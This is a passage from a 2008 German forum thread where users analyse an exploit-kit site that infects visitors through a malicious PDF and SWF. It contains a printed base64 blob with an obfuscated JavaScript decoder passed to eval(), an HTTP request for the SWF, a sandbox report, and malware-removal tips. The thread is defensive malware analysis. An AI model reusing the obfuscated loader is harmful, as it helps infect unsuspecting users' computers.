T1R6aE1NbFJqUXpneGRYSXphSFZNYjNaSE9VOVBPREZoYkhCZlRqTkdPRGhTV2pobGVuZ3paWHB0T0RobGJGbE1WbEpqYjFaQ09EZ3pXa3hmZDFZeFlXaHdNVzkxZVV4TFNHMW9hRFJ3UVc1eWVXRmhUSEYzYUdweE16Uk9VMUZIUUdoak9GUmFkRkpRYkhCT1VuQmZhR3h0YUdWTFIxTnNjMUppWlRoVWNHRjNWakZoWmxsWlRrOXpVVEpyYUdWb2RqRk1NWHB0WDJGTWNYQm9VbHBmWVhoQ1EwNXNURjlmYUhBeGIzVjVURXRJYldob05IQkJibko1TlV4QVUyZ3plbGxwTkV0eFMxODRPRXd5VkdORE9ERjFjak5vZFV4dmRrYzVUek5yVERoc1FqaEtWbE4zTW5kTGQyaHFjVE0wVGxOUlIwQm9ZemhVV25SU1VHeGlNMHRaV1U1NFlsOWZlbDkzWDI1eGR6aEtjRk5mUzNOUk1tdG9aV2gyTVV3eGVtMVJUMm80WVdGTU9ERmhNWEZ3YVVweFUxOUxjMUV5YTJobGFIWXhUREY2YlZGUGVUaGhZVXc0TVdGNWNYQnBTbkZpTkRaME0xSm9XakU0TVZSUlRtUkNTMnhQU3pGaGVsOVRZVjkzWDJGMmJURkFZMmhqYmt0VGNVNDJkVE15V1hCVFUwOURTMTkzY1ZOM1gzQlRYM1p0TVVCamFHTnVTMU54VGpaMVlUSlpjSGRUVEhGaWJrOUdjR2xQYzFFeWEyaGxhSFl4VERGNmJWRlBlVGhoWVY5eGR6SjNjVk4zWDNCVFgzWnRNVUJqYUdOdVMxTnhUaloxWVRKWmNGTlRUM05MWDNkeFlrdFBYMmszWjFsZlIyWjNURjkzVmpGaFpsbFpUazkwT0VweFRGOU9SVXh4TjFSd2QxTlBVVU5vVW0xUk0yeHdPR1ZMVkhkcGRYQjBNMnByYUdsMWNIUXphbXRaWVhkV01XRjJVMmc0T0dOTVgxWlphVTlUY0VOQVUwWnBiek5MYUdVeldrdzBTM0JUVTA5ME1XNVRVWEV5ZDNGVE5IaFRNMHRxZURNeFRYQmhZVFE0TVdGV1dXbFBVM0JEUUZOR2FXOXVjVk0wUzB4alRqTnJZMmc0ZDJnemIyMWhOR1ZDT0dWUE9ERmhTVkpNYURoWldUTXphMk5vT0hkb1pVQmlPRGRvV1dnNE9FdzVhRXBTVEY5dWJUZzBiM2xaTVU5VWNHRTRPR05PTjNreFlWWlphVTlUY0VOQVUwWnBiMHhNWWpGUE9GOWhUSEIzT0RSQ2NtaEFVMlV6YlZOM1gyNXhkM2NuS1RzPQ==" );
                    
    bcTm3E = VgYbPlrsoUtZB ( ghVLJIEqm5Yq );
                    eval(
    bcTm3E );
    (Ich hab schon den \ Müll entfernt)
    Wie gesagt diese Funktionen dienen nur zum Entschlüsseln eines weiteren Javascripts:
    No File | xup.in

    Und das Script entschlüsselt das finale exploit script:
    Frubar Paste

    Dieses Script lässt sich jetzt diesem Exploit zuordnen:
    http://www.securityfocus.com/bid/27641/info

    Was der Shellcode in dem Exploit genau macht lässt sich leider nicht so einfach rausfinden.

    Neben dem pdf wird auch noch eine SWF Datei aufgerufen, da könnte auch nochmal ein Exploit drin sein:
    Code:
    GET /news/files/swf.swf HTTP/1.1
    Host: vide0portal.com
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.3) Gecko/2008092417
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip,deflate
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 300
    Connection: keep-alive
    Referer: http://vide0portal.com/news/index.php
    Auf dem Server läuft mit Sicherheit ein Exploit-Kit. Je nachdem mit was der User auf die Webseite geht werden eben ein paar Exploits ausgepackt. Es kann also sein das noch viel mehr Exploits auf der Webseite schlummern und nur auf den richtigen Browser und das richtige OS warten.
    Um sich ein bisschen vor solchen Exploit-Kits zu schützen ist es deshalb sehr ratsam den verräterischen Browser-User-Agent zu ändern. Wie steht auf wiki User_Agent
     
  15. #14 30. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    Hammer geil,
    Ihr seid echt die Besten ^^

    Also hat mir NoScript mal das "Leben" gerettet, wenn es wie du sagst ein JavaScript war.

    Aber was ich net kapier, wenn es NoScript blockt wieso konnte dann mein firefox auf einmal so rumspinnen, dass er sich aufhängt etc. wenn doch kein Script gestartet wurde.

    Und wieso kann ich mein ebay PW net ändern :(

    Ist immernoch der Scheiß das ich nach dem ändern in MeinEbay reinkomme, das PW ist aber immernoch gleich und ne e-mail krieg ich auch net :(

    BW sind raus

    VIELEN DANK!!!
     
  16. #15 30. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    NoScript bringt in diesem Fall eigentlich nichts, weil es ein Adobe Reader Exploit ist. Wenn du dieses PDF File mit einem angreifbaren Adobe Reader (steht da welche das genau sind: Adobe Acrobat and Reader Multiple Arbitrary Code Execution and Security Vulnerabilities ) geöffnet hast (der Reader öffnet sich ja automatisch im Browser) dann bist du infiziert.
    Vielleicht mal hijackthis laufen lassen oder Antivirenscanner suchen lassen.
     
  17. #16 30. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    joa ich hab kein Adobe Reader installiert sondern den Foxit PDF Reader, deswegen hab ich ja eig. Glück gehabt :)

    Aber so wie ich es verstanden hätte, öffnet das JavaScript die PDF, aber war anscheinend falsch, zusätzlich zum Script noch die pdf. (und ne swf).
     
  18. #17 30. Dezember 2008
    Zuletzt von einem Moderator bearbeitet: 14. April 2017
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    Also ich habs dummerweise ja probiert und bin evtl. infiziert.
    Seit dem bekomm ich einen Error bei Hijackthis.
    Also er erstellt alles aber bei
    O15 oder O23 kommt dann :
    [​IMG]

    was soll ich machen ^^
     
  19. #18 30. Dezember 2008
    Zuletzt von einem Moderator bearbeitet: 14. April 2017
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    lass mal nen Virenscan durchlaufen!

    Hast du Adobe oder was anderes um pdf dateien zu lesen?

    Bleibt dann noch die Scheiß swf ^^
    Also bei nem Virenscan hat der bei mir über 20 Viren und Trojaner gefunden und ich denk mal jetzt bin ich clean ^^ hab auch nach rootkits gesucht gehabt nix und Spyware ist auch nix hier.
     
  20. #19 30. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    Hab Adobe Photoreader :/
    naja ich lass ma durchlaufen
    bis jetzt nur aeq hacks gefunden als viren ^^
     
  21. #20 30. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    Anubis: Analyzing Unknown Binaries

    Spoiler
    ___ __ _
    + /- / | ____ __ __/ /_ (_)____ -\ +
    /s h- / /| | / __ \/ / / / __ \/ / ___/ -h s\
    oh-:d/ / ___ |/ / / / /_/ / /_/ / (__ ) /d:-ho
    shh+hy- /_/ |_/_/ /_/\__,_/_.___/_/____/ -yh+hhs
    -:+hhdhyys/- -\syyhdhh+:-
    -//////dhhhhhddhhyss- Analysis Report -ssyhhddhhhhhd\\\\\\-
    /++/////oydddddhhyys/ ooooooooooooooooooooo \syyhhdddddyo\\\\\++\
    -+++///////odh/- -+hdo\\\\\\\+++-
    +++++++++//yy+/: :\+yy\\+++++++++
    /+soss+sys//yyo/os++o+: :+o++so\oyy\\sys+ssos+\
    +oyyyys++o/+yss/+/oyyyy: :yyyyo\+\ssy+\o++syyyyo+
    +oyyyyyyso+os/o/+yyyyyy/ \yyyyyy+\o\so+osyyyyyyo+


    [#############################################################################]
    Analysis Report for http://vide0portal.com/news/index.php
    [#############################################################################]

    Summary:
    - Changes security settings of Internet Explorer:
    This system alteration could seriously affect safety surfing the World
    Wide Web.

    - Performs File Modification and Destruction:
    The executable modifiesand destructs files which are not temporary.

    - Performs Registry Activities:
    The executable reads and modifies registry values. It also creates and
    monitors registry keys.

    [=============================================================================]
    Table of Contents
    [=============================================================================]

    - General information
    - iexplore.exe
    a) Registry Activities
    b) File Activities
    c) Process Activities
    d) Network Activities
    e) Other Activities


    [#############################################################################]
    1. General Information
    [#############################################################################]
    [=============================================================================]
    Information about Anubis' invocation
    [=============================================================================]
    Time needed: 241 s
    Report created: 12/30/08, 21:21:51 UTC
    Termination reason: Timeout
    Program version: 1.67.0

    [=============================================================================]
    Global Network Activities
    [=============================================================================]
    [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    Unknown UDP Traffic:
    [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    From ANUBIS:1026 to 192.168.0.1:53
    State: [ Normal establishment and termination ],
    Outbound Bytes: [ 33 ], Inbound Bytes: [ 128 ]



    [#############################################################################]
    2. iexplore.exe
    [#############################################################################]
    [=============================================================================]
    General information about this executable
    [===]
    Analysis Reason: Primary Analysis Subject
    Filename: iexplore.exe
    Command Line: "C:\Programme\Internet Explorer\iexplore.exe" http://vide0portal.com/news/index.php
    Process-status
    at analysis end: alive
    Exit Code: 0

    [===]
    Load-time Dlls
    [===]
    Module Name: [ C:\WINDOWS\System32\ntdll.dll ],
    Base Address: [0x77F40000 ], Size: [0x000B0000 ]
    Module Name: [ C:\WINDOWS\system32\kernel32.dll ],
    Base Address: [0x77E40000 ], Size: [0x000F7000 ]
    Module Name: [ C:\WINDOWS\system32\msvcrt.dll ],
    Base Address: [0x77BE0000 ], Size: [0x00053000 ]
    Module Name: [ C:\WINDOWS\system32\USER32.dll ],
    Base Address: [0x77D10000 ], Size: [0x0008D000 ]
    Module Name: [ C:\WINDOWS\system32\GDI32.dll ],
    Base Address: [0x77C40000 ], Size: [0x00040000 ]
    Module Name: [ C:\WINDOWS\system32\ADVAPI32.dll ],
    Base Address: [0x77DA0000 ], Size: [0x0009A000 ]
    Module Name: [ C:\WINDOWS\system32\RPCRT4.dll ],
    Base Address: [0x77C90000 ], Size: [0x00075000 ]
    Module Name: [ C:\WINDOWS\system32\SHLWAPI.dll ],
    Base Address: [0x772A0000 ], Size: [0x00063000 ]
    Module Name: [ C:\WINDOWS\System32\SHDOCVW.dll ],
    Base Address: [0x76970000 ], Size: [0x00149000 ]
    Module Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a\comctl32.dll ],
    Base Address: [0x71950000 ], Size: [0x000E4000 ]

    [===]
    Run-time Dlls
    [===]
    Module Name: [ C:\WINDOWS\System32\wsock32.dll ],
    Base Address: [0x00C40000 ], Size: [0x00009000 ]
    Module Name: [ C:\WINDOWS\System32\WS2_32.dll ],
    Base Address: [0x00C50000 ], Size: [0x00015000 ]
    Module Name: [ C:\WINDOWS\System32\WS2HELP.dll ],
    Base Address: [0x00C70000 ], Size: [0x00008000 ]
    Module Name: [ C:\WINDOWS\System32\wshtcpip.dll ],
    Base Address: [0x00C80000 ], Size: [0x00008000 ]
    Module Name: [ C:\WINDOWS\system32\mswsock.dll ],
    Base Address: [0x00EA0000 ], Size: [0x0003C000 ]
    Module Name: [ C:\WINDOWS\System32\UxTheme.dll ],
    Base Address: [0x5B0F0000 ], Size: [0x00034000 ]
    Module Name: [ C:\Programme\Java\jre1.6.0_07\bin\ssv.dll ],
    Base Address: [0x6D7C0000 ], Size: [0x0007B000 ]
    Module Name: [ C:\WINDOWS\System32\NETAPI32.dll ],
    Base Address: [0x71BA0000 ], Size: [0x0004F000 ]
    Module Name: [ C:\WINDOWS\System32\sensapi.dll ],
    Base Address: [0x72240000 ], Size: [0x00005000 ]
    Module Name: [ C:\WINDOWS\System32\browselc.dll ],
    Base Address: [0x723C0000 ], Size: [0x00013000 ]
    Module Name: [ C:\WINDOWS\System32\MSLS31.DLL ],
    Base Address: [0x74640000 ], Size: [0x00027000 ]
    Module Name: [ C:\WINDOWS\System32\msimtf.dll ],
    Base Address: [0x74670000 ], Size: [0x00029000 ]
    Module Name: [ C:\WINDOWS\System32\MSCTF.dll ],
    Base Address: [0x746A0000 ], Size: [0x0004B000 ]
    Module Name: [ C:\WINDOWS\System32\mlang.dll ],
    Base Address: [0x746F0000 ], Size: [0x0008F000 ]
    Module Name: [ C:\WINDOWS\System32\mshtml.dll ],
    Base Address: [0x74790000 ], Size: [0x002AD000 ]
    Module Name: [ C:\WINDOWS\system32\USERENV.dll ],
    Base Address: [0x75A10000 ], Size: [0x000A5000 ]
    Module Name: [ C:\WINDOWS\System32\jscript.dll ],
    Base Address: [0x75BF0000 ], Size: [0x00091000 ]
    Module Name: [ C:\WINDOWS\System32\SXS.DLL ],
    Base Address: [0x75E30000 ], Size: [0x000A2000 ]
    Module Name: [ C:\WINDOWS\system32\appHelp.dll ],
    Base Address: [0x75EE0000 ], Size: [0x0001D000 ]
    Module Name: [ C:\WINDOWS\System32\BROWSEUI.dll ],
    Base Address: [0x75F20000 ], Size: [0x000FC000 ]
    Module Name: [ C:\WINDOWS\system32\urlmon.dll ],
    Base Address: [0x76090000 ], Size: [0x00078000 ]
    Module Name: [ C:\WINDOWS\System32\shdoclc.dll ],
    Base Address: [0x76110000 ], Size: [0x0008E000 ]
    Module Name: [ C:\WINDOWS\system32\WININET.dll ],
    Base Address: [0x761A0000 ], Size: [0x00098000 ]
    Module Name: [ C:\WINDOWS\system32\MSASN1.dll ],
    Base Address: [0x76240000 ], Size: [0x0000F000 ]
    Module Name: [ C:\WINDOWS\system32\CRYPT32.dll ],
    Base Address: [0x76260000 ], Size: [0x0008B000 ]
    Module Name: [ C:\WINDOWS\System32\IMM32.DLL ],
    Base Address: [0x76330000 ], Size: [0x0001A000 ]
    Module Name: [ C:\WINDOWS\System32\CSCDLL.dll ],
    Base Address: [0x765A0000 ], Size: [0x0001B000 ]
    Module Name: [ C:\WINDOWS\System32\cscui.dll ],
    Base Address: [0x765C0000 ], Size: [0x00050000 ]
    Module Name: [ C:\WINDOWS\System32\SETUPAPI.dll ],
    Base Address: [0x76620000 ], Size: [0x000E5000 ]
    Module Name: [ C:\WINDOWS\System32\shfolder.dll ],
    Base Address: [0x76730000 ], Size: [0x00008000 ]
    Module Name: [ C:\WINDOWS\System32\WINMM.dll ],
    Base Address: [0x76AF0000 ], Size: [0x0002D000 ]
    Module Name: [ C:\WINDOWS\System32\rtutils.dll ],
    Base Address: [0x76E40000 ], Size: [0x0000D000 ]
    Module Name: [ C:\WINDOWS\System32\rasman.dll ],
    Base Address: [0x76E50000 ], Size: [0x00011000 ]
    Module Name: [ C:\WINDOWS\System32\TAPI32.dll ],
    Base Address: [0x76E70000 ], Size: [0x0002A000 ]
    Module Name: [ C:\WINDOWS\System32\RASAPI32.DLL ],
    Base Address: [0x76EA0000 ], Size: [0x00037000 ]
    Module Name: [ C:\WINDOWS\System32\DNSAPI.dll ],
    Base Address: [0x76EE0000 ], Size: [0x00025000 ]
    Module Name: [ C:\WINDOWS\system32\WLDAP32.dll ],
    Base Address: [0x76F20000 ], Size: [0x0002D000 ]
    Module Name: [ C:\WINDOWS\System32\Secur32.dll ],
    Base Address: [0x76F50000 ], Size: [0x00010000 ]
    Module Name: [ C:\WINDOWS\System32\winrnr.dll ],
    Base Address: [0x76F70000 ], Size: [0x00007000 ]
    Module Name: [ C:\WINDOWS\System32\rasadhlp.dll ],
    Base Address: [0x76F80000 ], Size: [0x00005000 ]
    Module Name: [ C:\WINDOWS\System32\CLBCATQ.DLL ],
    Base Address: [0x76F90000 ], Size: [0x00078000 ]
    Module Name: [ C:\WINDOWS\System32\COMRes.dll ],
    Base Address: [0x77010000 ], Size: [0x000D3000 ]
    Module Name: [ C:\WINDOWS\system32\OLEAUT32.dll ],
    Base Address: [0x770F0000 ], Size: [0x0008B000 ]
    Module Name: [ C:\WINDOWS\system32\ole32.dll ],
    Base Address: [0x77180000 ], Size: [0x0011A000 ]
    Module Name: [ C:\WINDOWS\system32\comctl32.dll ],
    Base Address: [0x77310000 ], Size: [0x0008B000 ]
    Module Name: [ C:\WINDOWS\system32\SHELL32.dll ],
    Base Address: [0x773A0000 ], Size: [0x007FE000 ]
    Module Name: [ C:\WINDOWS\system32\VERSION.dll ],
    Base Address: [0x77BD0000 ], Size: [0x00007000 ]
    Module Name: [ C:\Programme\Java\jre1.6.0_07\bin\MSVCR71.dll ],
    Base Address: [0x7C340000 ], Size: [0x00056000 ]

    [===]
    2.a) iexplore.exe - Registry Activities
    [===]
    [=-=]
    Registry Values Read:
    [=-=]
    Key: [ HKLM\SYSTEM\CurrentControlSet\Control\Session Manager ],
    Value Name: [ CriticalSectionTimeout ], Value: [ 2592000 ], 1 time
    Key: [ HKLM\SYSTEM\CurrentControlSet\Services\Winsock\Parameters ],
    Value Name: [ Transports ], Value: [ 0x5400630070006900700000004e0065007400420049004f00530000000000 ], 2 times
    Key: [ HKLM\SYSTEM\Setup ],
    Value Name: [ OsLoaderPath ], Value: [ \ ], 2 times
    Key: [ HKLM\SYSTEM\Setup ],
    Value Name: [ SystemPartition ], Value: [ \Device\HarddiskVolume1 ], 2 times
    Key: [ HKLM\Software\Microsoft\Internet Explorer\URL Compatibility\~/CONNWIZ.HTM ],
    Value Name: [ Compatibility Flags ], Value: [ 4 ], 1 time
    Key: [ HKLM\Software\Microsoft\Internet Explorer\URL Compatibility\~/CWIZINTR.HTM ],
    Value Name: [ Compatibility Flags ], Value: [ 4 ], 1 time
    Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion ],
    Value Name: [ DevicePath ], Value: [ %SystemRoot%\inf ], 1 time
    Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\ICWCONN1.EXE ],
    Value Name: [ Path ], Value: [ C:\Programme\Internet Explorer\Connection Wizard; ], 1 time
    Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Setup ],
    Value Name: [ DriverCachePath ], Value: [ %SystemRoot%\Driver Cache ], 2 times
    Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Setup ],
    Value Name: [ ServicePackSourcePath ], Value: [ D:\ ], 2 times
    Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Setup ],
    Value Name: [ SourcePath ], Value: [ D:\ ], 2 times
    Key: [ HKLM\System\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm ],
    Value Name: [ wheel ], Value: [ 1 ], 1 time
    Key: [ HKLM\System\CurrentControlSet\Control\ProductOptions ],
    Value Name: [ ProductType ], Value: [ WinNT ], 1 time
    Key: [ HKLM\System\CurrentControlSet\Control\Session Manager\WPA\PnP ],
    Value Name: [ seed ], Value: [ 3051945280 ], 1 time
    Key: [ HKLM\System\CurrentControlSet\Services\LDAP ],
    Value Name: [ LdapClientIntegrity ], Value: [ 1 ], 1 time
    Key: [ HKLM\System\CurrentControlSet\Services\Tcpip\Parameters ],
    Value Name: [ UseDomainNameDevolution ], Value: [ 1 ], 1 time
    Key: [ HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock ],
    Value Name: [ HelperDllName ], Value: [ %SystemRoot%\System32\wshtcpip.dll ], 1 time
    Key: [ HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock ],
    Value Name: [ Mapping ], Value: [ 0x0b0000000300000002000000010000000600000002000000010000000000 ], 1 time
    Key: [ HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock ],
    Value Name: [ MaxSockaddrLength ], Value: [ 16 ], 1 time
    Key: [ HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock ],
    Value Name: [ MinSockaddrLength ], Value: [ 16 ], 1 time
    Key: [ HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock ],
    Value Name: [ UseDelayedAcceptance ], Value: [ 0 ], 1 time
    Key: [ HKU\S-1-5-21-1343024091-1292428093-1606980848-500\Keyboard Layout\Toggle ],
    Value Name: [ Language Hotkey ], Value: [ 1 ], 2 times
    Key: [ HKU\S-1-5-21-1343024091-1292428093-1606980848-500\Keyboard Layout\Toggle ],
    Value Name: [ Layout Hotkey ], Value: [ 2 ], 2 times
    Key: [ HKU\S-1-5-21-1343024091-1292428093-1606980848-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ],
    Value Name: [ Local Settings ], Value: [ %USERPROFILE%\Lokale Einstellungen ], 1 time
    Key: [ HKU\S-1-5-21-1343024091-1292428093-1606980848-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ],
    Value Name: [ Personal ], Value: [ %USERPROFILE%\Eigene Dateien ], 1 time


    [===]
    2.b) iexplore.exe - File Activities
    [===]
    [=-=]
    Files Created:
    [=-=]
    File Name: [ C:\Dokumente und Einstellungen\Administrator\Lokale Einstellungen\Temporary Internet Files\Content.IE5\CHT2SY0U\index[1].htm ]

    [=-=]
    Files Read:
    [=-=]
    File Name: [ PIPE\svcctl ]

    [=-=]
    Files Modified:
    [=-=]
    File Name: [ C:\Dokumente und Einstellungen\Administrator\Lokale Einstellungen\Temporary Internet Files\Content.IE5\CHT2SY0U\index[1].htm ]
    File Name: [ PIPE\svcctl ]
    File Name: [ \Device\Afd\Endpoint ]

    [=-=]
    Device Control Communication:
    [=-=]
    File: [ \Device\KsecDD ], Control Code: [ 0x00390008 ], 8 times
    [=-=]
    Memory Mapped Files:
    [=-=]
    File Name: [ C:\Programme\Java\jre1.6.0_07\bin\MSVCR71.dll ]
    File Name: [ C:\Programme\Java\jre1.6.0_07\bin\ssv.dll ]
    File Name: [ C:\WINDOWS\System32\BROWSEUI.dll ]
    File Name: [ C:\WINDOWS\System32\CLBCATQ.DLL ]
    File Name: [ C:\WINDOWS\System32\COMRes.dll ]
    File Name: [ C:\WINDOWS\System32\CSCDLL.dll ]
    File Name: [ C:\WINDOWS\System32\DNSAPI.dll ]
    File Name: [ C:\WINDOWS\System32\IMM32.DLL ]
    File Name: [ C:\WINDOWS\System32\MSCTF.dll ]
    File Name: [ C:\WINDOWS\System32\MSLS31.DLL ]
    File Name: [ C:\WINDOWS\System32\NETAPI32.dll ]
    File Name: [ C:\WINDOWS\System32\RASAPI32.DLL ]
    File Name: [ C:\WINDOWS\System32\SETUPAPI.dll ]
    File Name: [ C:\WINDOWS\System32\SXS.DLL ]
    File Name: [ C:\WINDOWS\System32\Secur32.dll ]
    File Name: [ C:\WINDOWS\System32\TAPI32.dll ]
    File Name: [ C:\WINDOWS\System32\UxTheme.dll ]
    File Name: [ C:\WINDOWS\System32\WINMM.dll ]
    File Name: [ C:\WINDOWS\System32\WS2HELP.dll ]
    File Name: [ C:\WINDOWS\System32\WS2_32.dll ]
    File Name: [ C:\WINDOWS\System32\browselc.dll ]
    File Name: [ C:\WINDOWS\System32\cscui.dll ]
    File Name: [ C:\WINDOWS\System32\jscript.dll ]
    File Name: [ C:\WINDOWS\System32\mlang.dll ]
    File Name: [ C:\WINDOWS\System32\msimtf.dll ]
    File Name: [ C:\WINDOWS\System32\rasadhlp.dll ]
    File Name: [ C:\WINDOWS\System32\rasman.dll ]
    File Name: [ C:\WINDOWS\System32\rtutils.dll ]
    File Name: [ C:\WINDOWS\System32\sensapi.dll ]
    File Name: [ C:\WINDOWS\System32\shdoclc.dll ]
    File Name: [ C:\WINDOWS\System32\shfolder.dll ]
    File Name: [ C:\WINDOWS\System32\winrnr.dll ]
    File Name: [ C:\WINDOWS\System32\wshtcpip.dll ]
    File Name: [ C:\WINDOWS\System32\wsock32.dll ]
    File Name: [ C:\WINDOWS\system32\WININET.dll ]
    File Name: [ C:\WINDOWS\system32\mswsock.dll ]
    File Name: [ C:\WINDOWS\system32\urlmon.dll ]

    [===]
    2.c) iexplore.exe - Process Activities
    [===]
    [=-=]
    Thread Overview:
    [=-=]
    After 125 seconds, Number of threads: 1


    [===]
    2.d) iexplore.exe - Network Activities
    [===]
    [=-=]
    DNS Queries:
    [=-=]
    Name: [ vide0portal.com ], Query Type: [ DNS_TYPE_A ],
    Query Result: [ 58.241.255.34 ], Successful: [ 1 ], Protocol: [ ]

    [=-=]
    HTTP Conversations:
    [=-=]
    From ANUBIS:1034 to 58.241.255.34:80 - [ vide0portal.com ]
    Request: [ GET /news/index.php ], Response: [ 200 "OK" ]
    [=-]
    2.e) iexplore.exe - Other Activities
    [=-=]
    Mutexes Created:
    [=-=]
    Mutex: [ MSCTF.Shared.MUTEX.AFF ]
    Mutex: [ MSCTF.TimListMUTEX. ]
    Mutex: [ MSUIM.Assembly.Mutex ]
    Mutex: [ MSUIM.GlobalCompartment.Mutex ]
    Mutex: [ MSUIM.GlobalLangBarEventSink.Mutex ]
    Mutex: [ MSUIM.Layouts.Mutex ]
    Mutex: [ MSUIM.MarshalInterfaceMutex.TMD ]
    Mutex: [ ZonesCacheCounterMutex ]
    Mutex: [ ZonesCounterMutex ]
    [=-=]
    Keyboard Keys Monitored:
    [=-=]
    Virtual Key Code: [ VK_CONTROL (17) ], 18 times
    Virtual Key Code: [ VK_ESCAPE (27) ], 22 times
    Virtual Key Code: [ VK_SHIFT (16) ], 17 times
    Virtual Key Code: [ VK_MENU (18) ], 17 times
    Virtual Key Code: [ VK_LSHIFT (160) ], 12 times
    Virtual Key Code: [ VK_LCONTROL (162) ], 12 times
    Virtual Key Code: [ VK_LMENU (164) ], 12 times
    Virtual Key Code: [ VK_LBUTTON (1) ], 64 times
    Virtual Key Code: [ VK_RBUTTON (2) ], 5 times
    Virtual Key Code: [ VK_MBUTTON (4) ], 5 times

    hut ab vor dem, der die seite erstellt hat.

    der spoiler beschreibt, was passiert wenn man mit dem IE darauf surft und in keiner weise geschützt ist.

    meine empfehlung, eaktiviert javascript und java !!! und arbeitet NICHT mit admin rechten.

    dann ist diese seite ziemlich nutzlos.

    was aber, wenn ihr doch auf der seite wart?
    sucht manuell mit einem vom windows system unabhängigen dateimanager
    -> so etwas findet ihr in "icesword" oder in einer windows pe oder linux boot cd
    nach den dateien, die im spoiler aufgeführt sind, sichert die dateien und prüft jede der dateien auf jotti oder virustotal. ...
     
  22. #21 30. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    nope, du bekommst ne pdf -> in dieser is javascript-code -> dieser code nutzt ne lücke und führt shellcode aus (denk ich ma) -> es wird ne swf nachgeladen mit weiteren exploits

    also bringt dir ausgeschaltetes java oder javascript in dem fall überhaupt nix.
     

  23. Videos zum Thema
Die Seite wird geladen...